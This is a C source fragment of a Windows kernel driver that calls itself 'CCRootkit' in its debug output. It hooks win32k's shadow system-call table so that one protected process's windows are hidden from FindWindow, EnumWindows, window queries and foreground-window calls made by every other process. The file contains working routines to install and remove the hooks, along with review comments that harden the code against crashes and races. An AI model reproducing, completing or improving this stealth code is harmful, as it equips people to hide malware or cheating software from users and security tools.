{
NTSTATUS ntStatus;
PEPROCESS crsEProc;
PKAPC_STATE ApcState;
//获得shadow的地址
GetShadowTable();
//根据不同的系统获得不同的函数服务号
InitSysCallIndex();
ntStatus = PsLookupProcessByProcessId((HANDLE)GetCsrPid(), &crsEProc);
if (!NT_SUCCESS( ntStatus ))
{
dprintf("CCRootkit: PsLookupProcessByProcessId() error\n");
return ntStatus;
}
ApcState = (PKAPC_STATE)ExAllocatePool(NonPagedPool, sizeof(KAPC_STATE));
KeStackAttachProcess(crsEProc, ApcState);
//KeAttachProcess(crsEProc);
g_pMdlSystemCall = IoAllocateMdl(
KeServiceDescriptorTableShadow[1].ServiceTableBase,
KeServiceDescriptorTableShadow[1].NumberOfServices*4,
FALSE, //not associated with an IRP
FALSE, //charge quota, should be FALSE
NULL); //IRP * should be NULL
if(!g_pMdlSystemCall)
return STATUS_UNSUCCESSFUL;
MmBuildMdlForNonPagedPool(g_pMdlSystemCall);
g_pMdlSystemCall->MdlFlags = g_pMdlSystemCall->MdlFlags|MDL_MAPPED_TO_SYSTEM_VA;
MappedSystemCallTable = MmMapLockedPages(g_pMdlSystemCall, KernelMode);
__try
{
if( ( KeServiceDescriptorTableShadow != NULL )
&& ( NtUserFindWindowExIndex != 0 )
&& ( NtUserGetForegroundWindowIndex != 0 )
&& ( NtUserBuildHwndListIndex != 0 )
&& ( NtUserQueryWindowIndex != 0 )
/*
&& ( NtUserWindowFromPointIndex != 0 )
&& ( NtUserSetWindowsHookExIndex != 0 )
&& ( NtUserGetDCIndex != 0 )
&& ( NtUserGetDCExIndex != 0 )
&& ( NtUserSendInputIndex !=0 )
*/
)
{
//hook shadow system calls and save old system call locations
HOOK_SHADOW_SYSCALL( NtUserFindWindowExIndex, HookOfNtUserFindWindowEx, OrigNtUserFindWindowEx );
HOOK_SHADOW_SYSCALL( NtUserQueryWindowIndex, HookOfNtUserQueryWindow, OrigNtUserQueryWindow );
HOOK_SHADOW_SYSCALL( NtUserBuildHwndListIndex, HookOfNtUserBuildHwndList, OrigNtUserBuildHwndList );
HOOK_SHADOW_SYSCALL( NtUserGetForegroundWindowIndex, HookOfNtUserGetForegroundWindow, OrigNtUserGetForegroundWindow );
//HOOK_SHADOW_SYSCALL( NtUserWindowFromPointIndex, HookOfNtUserWindowFromPoint, OrigNtUserWindowFromPoint );
//HOOK NtUserSetWindowsHookEx用来防范安装全局钩子
//HOOK_SHADOW_SYSCALL( NtUserSetWindowsHookExIndex, HookOfNtUserSetWindowsHookEx, OrigNtUserSetWindowsHookEx );
//HOOK_SHADOW_SYSCALL( NtUserGetDCIndex, HookOfNtUserGetDC, OrigNtUserGetDC );
//HOOK_SHADOW_SYSCALL( NtUserGetDCExIndex, HookOfNtUserGetDCEx, OrigNtUserGetDCEx );
//挂钩NtUserSendInput来拦截键盘鼠标等模拟输入
//HOOK_SHADOW_SYSCALL( NtUserSendInputIndex, HookOfNtUserSendInput, OrigNtUserSendInput );
dprintf("DDDDDDDD %X, %X\n", HookOfNtUserFindWindowEx, OrigNtUserFindWindowEx);
}
else
{
KeServiceDescriptorTableShadow = NULL;
}
}
__finally
{
KeUnstackDetachProcess(ApcState);
//KeDetachProcess();
}
return ntStatus ;
}
//Remove the shadow SSDT hooks (restore the original win32k service entries)
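// Restore the original shadow-SSDT entries written by the install routine and
// release the MDL mapping of the service table.
//
// The shadow table lives in win32k's session space, so the writes are performed
// while attached to csrss.exe (GetCsrPid()). Every resource acquired here is
// released on every exit path: the EPROCESS reference returned by
// PsLookupProcessByProcessId, the non-paged KAPC_STATE, and (if it was ever
// created) the MDL / system mapping, whose globals are reset to NULL so a second
// call cannot unmap or free them twice.
//
// Returns STATUS_SUCCESS on completion, STATUS_UNSUCCESSFUL if csrss.exe cannot be
// looked up, STATUS_INSUFFICIENT_RESOURCES if the APC state cannot be allocated.
NTSTATUS UnHookShadowTable()
{
    NTSTATUS ntStatus;
    PEPROCESS crsEProc;
    PKAPC_STATE ApcState;

    ntStatus = PsLookupProcessByProcessId((HANDLE)GetCsrPid(), &crsEProc);
    if (!NT_SUCCESS(ntStatus))
    {
        dprintf("CCRootkit: PsLookupProcessByProcessId() error\n");
        return STATUS_UNSUCCESSFUL;
    }
    // crsEProc now carries a reference that must be dropped before returning.

    ApcState = (PKAPC_STATE)ExAllocatePool(NonPagedPool, sizeof(KAPC_STATE));
    if (ApcState == NULL)
    {
        ObDereferenceObject(crsEProc);
        return STATUS_INSUFFICIENT_RESOURCES;
    }

    KeStackAttachProcess(crsEProc, ApcState);
    __try
    {
        // Only touch the table if the install routine validated it (it sets
        // KeServiceDescriptorTableShadow to NULL when any index was unresolved).
        if ((KeServiceDescriptorTableShadow != NULL)
            && (NtUserFindWindowExIndex != 0)
            && (NtUserGetForegroundWindowIndex != 0)
            && (NtUserBuildHwndListIndex != 0)
            && (NtUserQueryWindowIndex != 0))
        {
            UNHOOK_SHADOW_SYSCALL(NtUserFindWindowExIndex, HookOfNtUserFindWindowEx, OrigNtUserFindWindowEx);
            UNHOOK_SHADOW_SYSCALL(NtUserQueryWindowIndex, HookOfNtUserQueryWindow, OrigNtUserQueryWindow);
            UNHOOK_SHADOW_SYSCALL(NtUserBuildHwndListIndex, HookOfNtUserBuildHwndList, OrigNtUserBuildHwndList);
            UNHOOK_SHADOW_SYSCALL(NtUserGetForegroundWindowIndex, HookOfNtUserGetForegroundWindow, OrigNtUserGetForegroundWindow);
            // Hooks that are not installed by the install routine (WindowFromPoint,
            // SetWindowsHookEx, GetDC, GetDCEx, SendInput) have nothing to restore.
        }
    }
    __finally
    {
        KeUnstackDetachProcess(ApcState);
        // NOTE(review): Sleep() is presumably a project wrapper over
        // KeDelayExecutionThread. A fixed 50 ms delay is not a synchronization
        // with threads that may still be executing inside a hook routine; confirm
        // the caller guarantees no in-flight calls before the driver unloads.
        Sleep(50);
    }

    ExFreePool(ApcState);
    ObDereferenceObject(crsEProc);

    if (MappedSystemCallTable)
    {
        MmUnmapLockedPages(MappedSystemCallTable, g_pMdlSystemCall);
        IoFreeMdl(g_pMdlSystemCall);
        // Reset so a repeated unhook is a no-op rather than a double unmap/free.
        MappedSystemCallTable = NULL;
        g_pMdlSystemCall = NULL;
    }
    return STATUS_SUCCESS;
}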
// The hooks below intercept NtUserFindWindowEx, NtUserBuildHwndList, NtUserQueryWindow and
// NtUserGetForegroundWindow so that other applications cannot locate or enumerate our
// window through FindWindow / FindWindowEx / EnumWindows / EnumChildWindows /
// GetForegroundWindow. (A NtUserWindowFromPoint hook exists further down but is commented
// out and is not installed, so WindowFromPoint is NOT currently intercepted.)
// Implementation of the hook functions:
// Shadow-SSDT hook for NtUserFindWindowEx.
// The real service runs first. If the caller is not the protected process and the
// window it found is owned by the protected process (owner looked up via
// NtUserQueryWindow with TypeInformation 0), the result is replaced by 0 so the
// window appears not to exist. The protected process itself always receives the
// real result.
// Note: the declared return type is NTSTATUS, but the value carried is the window
// handle produced by the real service (0 = no window).
NTSTATUS HookOfNtUserFindWindowEx(
    IN HWND hwndParent,
    IN HWND hwndChild,
    IN PUNICODE_STRING pstrClassName OPTIONAL,
    IN PUNICODE_STRING pstrWindowName OPTIONAL,
    IN DWORD dwType)
{
    NTSTATUS foundWindow = OrigNtUserFindWindowEx(hwndParent, hwndChild, pstrClassName, pstrWindowName, dwType);

    if (PsGetCurrentProcessId() == (HANDLE)ProcessIdToProtect)
    {
        dprintf("EEEEEEEEE NtUserFindWindowEx is called\n");
    }
    else
    {
        ULONG ownerPid = OrigNtUserQueryWindow(foundWindow, 0);
        dprintf("ProcessID:%d", ownerPid);
        if (ownerPid == (ULONG)ProcessIdToProtect)
        {
            // Pretend the lookup failed.
            return 0;
        }
    }

    dprintf("NtUserFindWindowEx is called\n");
    return foundWindow;
}
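// Shadow-SSDT hook for NtUserBuildHwndList (the service behind EnumWindows /
// EnumChildWindows).
//
// For callers other than the protected process:
//   * when children of hwndNext are requested (fEnumChildren == 1) and hwndNext is
//     owned by the protected process, the call fails with STATUS_UNSUCCESSFUL
//     before reaching win32k;
//   * otherwise the real service runs and, on STATUS_SUCCESS, every handle in the
//     returned list whose owner (NtUserQueryWindow, TypeInformation 0) is the
//     protected process is compacted out of phwndFirst, the vacated tail slots are
//     zeroed and *pcHwndNeeded is reduced to the number of handles kept.
// The protected process itself always receives the unfiltered list.
//
// phwndFirst and pcHwndNeeded are caller-supplied (normally user-mode) pointers.
// The real service validated them, but user mode can still unmap the pages or
// rewrite *pcHwndNeeded between that call and our post-processing, so the filter
//   (a) reads the count exactly once,
//   (b) never walks past the cHwndMax slots the caller declared,
//   (c) re-probes the buffer for user-mode callers, and
//   (d) touches the buffer only inside __try/__except, so a bad pointer becomes
//       an error status instead of a bugcheck.
// Returns the status of the real service, or the exception code if the buffer
// became inaccessible while it was being filtered.
NTSTATUS HookOfNtUserBuildHwndList(
    IN HDESK hdesk,
    IN HWND hwndNext,
    IN ULONG fEnumChildren,
    IN DWORD idThread,
    IN UINT cHwndMax,
    OUT HWND *phwndFirst,
    OUT ULONG* pcHwndNeeded)
{
    NTSTATUS ntStatus;

    if (PsGetCurrentProcessId() == (HANDLE)ProcessIdToProtect)
    {
        dprintf("EEEEEEEEE NtUserBuildHwndList is called\n");
        dprintf("NtUserBuildHwndList is called\n");
        return OrigNtUserBuildHwndList(hdesk, hwndNext, fEnumChildren, idThread, cHwndMax, phwndFirst, pcHwndNeeded);
    }

    if (fEnumChildren == 1)
    {
        ULONG parentPid = OrigNtUserQueryWindow((ULONG)hwndNext, 0);
        if (parentPid == (ULONG)ProcessIdToProtect)
            return STATUS_UNSUCCESSFUL;
    }

    ntStatus = OrigNtUserBuildHwndList(hdesk, hwndNext, fEnumChildren, idThread, cHwndMax, phwndFirst, pcHwndNeeded);
    if (ntStatus != STATUS_SUCCESS)
        return ntStatus;

    __try
    {
        ULONG count;
        ULONG rd, wr;

        // Snapshot the count once; re-reading *pcHwndNeeded later would let user
        // mode change it underneath us (TOCTOU) and drive the loop off the buffer.
        if (ExGetPreviousMode() == UserMode)
            ProbeForWrite(pcHwndNeeded, sizeof(ULONG), sizeof(ULONG));
        count = *pcHwndNeeded;
        if (count > cHwndMax)
            count = cHwndMax;               // caller only provided cHwndMax slots
        if (count > ((ULONG)-1) / sizeof(HWND))
        {
            // Guard the probe length against wrap-around on 32-bit builds.
            ntStatus = STATUS_INVALID_PARAMETER;
            __leave;
        }
        if (ExGetPreviousMode() == UserMode)
            ProbeForWrite(phwndFirst, (SIZE_T)count * sizeof(HWND), sizeof(HWND));

        // Single-pass compaction: keep every handle not owned by the protected process.
        for (rd = 0, wr = 0; rd < count; rd++)
        {
            HWND hwnd = phwndFirst[rd];
            ULONG ownerPid = OrigNtUserQueryWindow((ULONG)hwnd, 0);
            if (ownerPid == (ULONG)ProcessIdToProtect)
                continue;
            phwndFirst[wr++] = hwnd;
        }
        *pcHwndNeeded = wr;
        // Zero the slots vacated by removed entries (same end state as the
        // previous shift-down implementation).
        for (; wr < count; wr++)
            phwndFirst[wr] = 0;
    }
    __except (EXCEPTION_EXECUTE_HANDLER)
    {
        ntStatus = GetExceptionCode();
    }
    return ntStatus;
}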
// Shadow-SSDT hook for NtUserGetForegroundWindow.
// Calls the real service, then, for callers other than the protected process:
// if the foreground window is owned by the protected process, the handle last
// handed out to an unprotected caller (global LastForegroundWindow) is returned
// instead; otherwise that global is refreshed with the current answer. The
// protected process itself always gets the real result.
// NOTE(review): LastForegroundWindow is a single global shared by every caller
// and session, with no locking; it may be stale or belong to another desktop.
ULONG HookOfNtUserGetForegroundWindow(VOID)
{
    NTSTATUS hwndForeground = OrigNtUserGetForegroundWindow();

    if (PsGetCurrentProcessId() == (HANDLE)ProcessIdToProtect)
    {
        dprintf("EEEEEEEEE NtUserGetForegroundWindow is called\n");
    }
    else
    {
        ULONG ownerPid = OrigNtUserQueryWindow(hwndForeground, 0);
        if (ownerPid == (ULONG)ProcessIdToProtect)
            hwndForeground = LastForegroundWindow;   // hide: answer with the previous one
        else
            LastForegroundWindow = hwndForeground;   // remember a safe answer
    }

    dprintf("NtUserGetForegroundWindow is called\n");
    return hwndForeground;
}
// Shadow-SSDT hook for NtUserQueryWindow.
// For callers other than the protected process, the owning process of
// WindowHandle is looked up first (TypeInformation 0); if it is the protected
// process the query answers 0 regardless of which TypeInformation was requested.
// Otherwise the original query is forwarded unchanged. The protected process
// itself always gets the real answer.
// NOTE(review): answering 0 for a handle the caller already holds is itself
// observable; a caller comparing this against other window APIs can detect the hook.
UINT_PTR HookOfNtUserQueryWindow(
    IN ULONG WindowHandle,
    IN ULONG TypeInformation)
{
    if (PsGetCurrentProcessId() == (HANDLE)ProcessIdToProtect)
    {
        dprintf("EEEEEEEEE NtUserQueryWindow is called\n");
    }
    else
    {
        ULONG ownerPid = OrigNtUserQueryWindow(WindowHandle, 0);
        if (ownerPid == (ULONG)ProcessIdToProtect)
            return 0;
    }

    dprintf("NtUserQueryWindow is called\n");
    return OrigNtUserQueryWindow(WindowHandle, TypeInformation);
}
/*
HWND HookOfNtUserWindowFromPoint(LONG x, LONG y)
{
dprintf("NtUserWindowFromPoint is called\n");
return 0;
}
HHOOK HookOfNtUserSetWindowsHookEx(
HINSTANCE Mod,
PUNICODE_STRING UnsafeModuleName,
DWORD ThreadId,
int HookId,
PVOID HookProc,
BOOL Ansi )
{
dprintf("NtUserSetWindowsHookEx is called\n");
return OrigNtUserSetWindowsHookEx(Mod, UnsafeModuleName,
ThreadId, HookId, HookProc, Ansi );
}
HDC HookOfNtUserGetDC(HWND hWnd)
{
dprintf("NtUserGetDC is called\n");
return OrigNtUserGetDC(hWnd);
}
HDC HookOfNtUserGetDCEx(HWND hWnd, HRGN hrgnClip, DWORD flags)
{
dprintf("NtUserGetDCEx is called\n");
return OrigNtUserGetDCEx(hWnd, hrgnClip, flags);
}
UINT HookOfNtUserSendInput(
UINT cInputs,
PINPUT pInputs,
int cbSize)
{
dprintf("NtUserSendInput is called\n");
return OrigNtUserSendInput(cInputs, pInputs, cbSize);
}
*/